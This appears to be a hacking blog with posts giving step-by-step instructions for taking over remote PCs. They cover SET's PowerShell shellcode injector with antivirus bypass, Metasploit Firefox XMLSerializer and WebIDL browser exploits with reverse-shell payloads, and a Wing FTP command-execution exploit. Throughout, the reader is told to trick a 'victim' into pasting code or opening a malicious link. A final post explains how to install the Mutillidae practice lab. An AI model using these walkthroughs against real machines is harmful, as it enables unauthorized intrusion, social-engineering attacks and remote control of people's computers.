Thursday 17 September 2015

Hack Windows7 PC using Powershell Attack Vector in Social Engineering Toolkit (Bypassing Antivirus).





The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by  Preventative Technologies.

  • Powershell Alphanumeric Shellcode Injector
  • Powershell Reverse Shell
  • Powershell Bind Shell
  • Powershell Dump SAM Database 
here we are using  Powershell Alphanumeric Shellcode Injector Technique .

-: Requiremets :-
   Attacker :- setoolkit
   Victim :- powershell and widnwos OS 

-: Steps :-  
1.Open terminal type 'setoolkit' and Hit Enter you see following in your terminal. 
 2..Now choose 1, “Social-Engineering Attacks.


3.Now choose 10, “Powershell Attack Vector”.

4.Now choose 1,Powershell Alphanumeric Shellcode Injector” and type IP address And Port No.  of Your PC for Reverse Connection.


5. Press Enter here SET will start Metasploit Payload handler service.

6.Now is retrieve the Powershell code that SET created. The code is saved in /root/.set/reports/powershell/x64_powershell_injection.txt Copy that file to Desktop And Send It to Victim.

7.Sent The Code or Send that text file and Tell Victim to Copy And Paste that Code in Command Prompt.  

 8. When Victim Paste That code in cmd And Press Enter after few seconds commnd prompt will close. and we will get meterpreter shell on msfconsole. :) 
 9. Now Type "sessions -l" to get list of session.
10.Now type "sessions -l ID" and Hit Enter. u will get meterpreter shell then type meterpreter commands to execute your activity for eg. shell to start and access command prompt.



 That's it 

Posted by at No comments:

Tuesday 17 February 2015

How exploit Remote Windows PC using Firefox XML Serializer Use After Free

Exploit Remote Windows PC using Firefox XML Serializer Use After Free



This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically an use after free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.


Exploit Targets :
Firefox 17.0.1 or lower
Windows XP SP3

Requirements:

Attacker:kali or backtrack linux
Victim PC:Windows XP
steps:
1.Open terminal type msfconsole

2.Now type use exploit/windows/browser/ mozilla_firefox_xmlserializer

3.msf exploit (mozilla_firefox_xmlserializer)>set payload windows/meterpreter/reverse_tcp

4.msf exploit (mozilla_firefox_xmlserializer)>set lhost 192.168.1.136 (IP of Local Host)

 5.msf exploit (mozilla_firefox_xmlserializer)>set srvhost 192.168.1.136 (IP of Local Host)

 6.msf exploit (mozilla_firefox_xmlserializer)>set uripath  /

7.msf exploit (mozilla_firefox_xmlserializer)>exploit

 8.Now an URL you should give to your victim http:// 192.168.1.136:8080/

Posted by at No comments:

Sunday 14 September 2014

How to Hack Remote Windows, Linux or MAC PC using Firefox WebIDL Privileged Javascript Injection ??



This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox’s Javascript APIs

Exploit Targets:-
Firefox 22-27

Windows XP SP 3

Windows 7

Linux

OSX

Requirement:-
Attacker: kali Linux

Victim PC: Windows 7





*steps* 

1.Open Kali terminal type

     msfconsole

2.Now type
  
    use exploit/multi/browser/firefox_webidl_injection

3.msf exploit (firefox_webidl_injection)>set payload firefox/shell_reverse_tcp

4.msf exploit (firefox_webidl_injection)>set lhost 192.168.0.5 (IP of Local Host)

5.msf exploit (firefox_webidl_injection)>set srvhost 192.168.0.5

6.msf exploit (firefox_webidl_injection)>set uripath /

7.msf exploit (firefox_webidl_injection)>exploit

8.Now an URL you should give to your victim http://192.168.0.5:8080/

Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Posted by at No comments:

How to Hack Remote Windows PC using Wing FTP Server Authenticated Command Execution ??

This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.

Exploit Targets:-
Wing FTP 4.3.8

Requirements :-
Attacker: kali Linux,backtrack linux

Victim PC: Windows 7

*steps:-*


1.Open Kali terminal type
        msfconsole

2.Now type

 use exploit/windows/ftp/wing_ftp_admin_exec

3.msf exploit (wing_ftp_admin_exec)>set payload windows/meterpreter/reverse_tcp

4.msf exploit (wing_ftp_admin_exec)>set lhost 192.168.0.10 (IP of Local Host)

5.msf exploit (wing_ftp_admin_exec)>set rhost 192.168.0.5 (IP of Remote Host)

6.msf exploit (wing_ftp_admin_exec)>set username rajchandel

7.msf exploit (wing_ftp_admin_exec)>set password ——–

8.msf exploit (wing_ftp_admin_exec)>exploit


That's it
Posted by at 8 comments:

Wednesday 11 June 2014

How to install Mutillidae in Kali Linux ?

// Intro :-
Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiest. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP. Mutillide gives you penetration testing environment where you can check your skill in a legal way. This is an easy-to-use web hacking environment designed for labs, security enthusiast, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web sec training courses, and as an "assess the assessor" target for vulnerability assessment software.
  

// Features 

  • Has over 35 vulnerablities and challenges. Contains at least one vulnearbility for each of the OWASP Top Ten 2007 and 2010
  • Actually Vulnerable (User not asked to enter “magic” statement)
  • Mutillidae can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to install or administrate their own webserver. Mutillidae is confirmed to work on XAMPP, WAMP, and LAMP. XAMPP is the "default" deployment.
  • Installs easily by dropping project files into the "htdocs" folder of XAMPP.
  • Will attempt to detect if the MySQL database is available for the user
  • Preinstalled on Rapid7 Metasploitable 2, Samurai Web Testing Framework (WTF), and OWASP Broken Web Apps (BWA)
  • Contains 2 levels of hints to help users get started
  • Includes bubble-hints to help point out vulnerable locations
  • Bubble-hints automatically give more information as hint level incremented
  • System can be restored to default with single-click of "Setup" button
  • User can switch between secure and insecure modes
  • Secure and insecure source code for each page stored in the same PHP file for easy comparison
  • Provides data capture page and stores captured data in database and file
  • Allows SSL to be enforced in order to practice SSL stripping
  • Used in graduate security courses, in corporate web sec training courses, and as an "assess the assessor" target for vulnerability software
  • Mutillidae has been tested/attacked with Cenzic Hailstorm ARC, W3AF, SQLMAP, Samurai WTF, Backtrack, HP Web Inspect, Burp-Suite, NetSparker Community Edition, and other tools

    • //steps

    1. Download Mutillidae : Click Here
     
    2. Unzip download file.

    3. Go to Latest-mutillidae-2.6.10 → var → www → mutillidae then copy "mutillidae" folder. We will paste this folder in our Kali Linux OS. If your Host OS is not shared with your Guest OS then you can use a Pendrive for moving this folder. (If your folder has different name then rename it as mutillidae).
    4.in Kali Linux Go to Computer → File system → var → www then Paste mutillidae folder. Please be sure your folder path is same as mine and Folder name should be also same.
    5. Set permission of mutillidae into 0777. Open Terminal and type
    chmod -R 0777 /var/www/mutillidae and Press enter.
    6.Run Apache, Go to Application → Kali Linux → System Service → HTTP → apache2start

    7.When Apache run successfully.

    8. Run My SQL, Go to Application → Kali Linux → System Service → MySQL → mysql start
    9.My SQL run successfully
    10. Now Create Database for mutilliade
    → Open Terminal  
    → type mysql –u root –p  and Press enter
    → when it ask for Password leave it blank and simply Press enter
    → now type create database mutillidae; and Press enter
    → Type exit and Press enter

    11. Open Your Internet Browser and Write 127.0.0.1/mutillidae in your web address then Press Enter. If You have done everything correct you will get the Mutillidae Interface. Now, Click on Reset DB


    12.Click OK
    14. Done

    Note - You have to repeat Step 7 - Step 10 each time whenever you will restart your Kali Linux only then 127.0.0.1/mutillidae will be work in your browser. 



    Posted by at No comments:
    Subscribe to: Posts (Atom)